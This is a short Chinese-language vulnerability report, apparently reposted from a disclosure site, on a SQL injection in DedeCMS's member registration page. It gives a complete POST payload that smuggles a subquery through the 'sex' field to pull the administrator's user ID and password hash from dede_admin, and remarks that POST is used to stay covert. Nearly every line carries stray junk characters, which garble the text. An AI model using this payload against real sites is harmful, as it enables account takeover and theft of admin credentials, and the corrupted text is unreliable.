漏洞类型: SQL注射漏洞$ e( f& J5 x1 f3 Q) L& |( }" N
简要描述:
6 k) P2 h" C0 }1 H# n: F
: n; t, O1 a n% e: k, X需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.$ ?( W' {0 t" ~% k2 B# y! X
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
; U0 Z6 F9 i% _ T4 j详细说明:跟这个漏洞
, d$ y0 K! o2 b% r$ {* O; T
, d! C0 o* G* m; U# O( P8 XWooYun: Dedecms SQL注射导致审核机制绕过漏洞
. }: }, v; @- C7 ^1 p是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.2 m! g; F7 @, J7 ^- v2 X8 ?
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
! c- p8 E- f. M7 ^
$ f0 @6 g. \2 pwww.political-security.com/member/reg_new.php
' V2 O# {8 E' F
B/ ?8 J& u2 T: f/ f0 p4 |POST
& L4 d% k2 ?0 q, N( D; ` 2 C- ?9 w+ r# P4 b/ P; ^
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&; }) U) k! i. k' ]. s6 ]% m
userid=c4rp3nt3r&uname=c4rp3nt3r7 [, c* w' [/ x$ H+ M2 U
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss% W/ B9 m3 j& e8 U7 A0 h! z
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
8 G5 F, Z: H1 [0 P$ @1 T, o(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
5 F6 K$ g3 _$ m: @5 S* f6 \: S%00&vdcode=glos&agree= |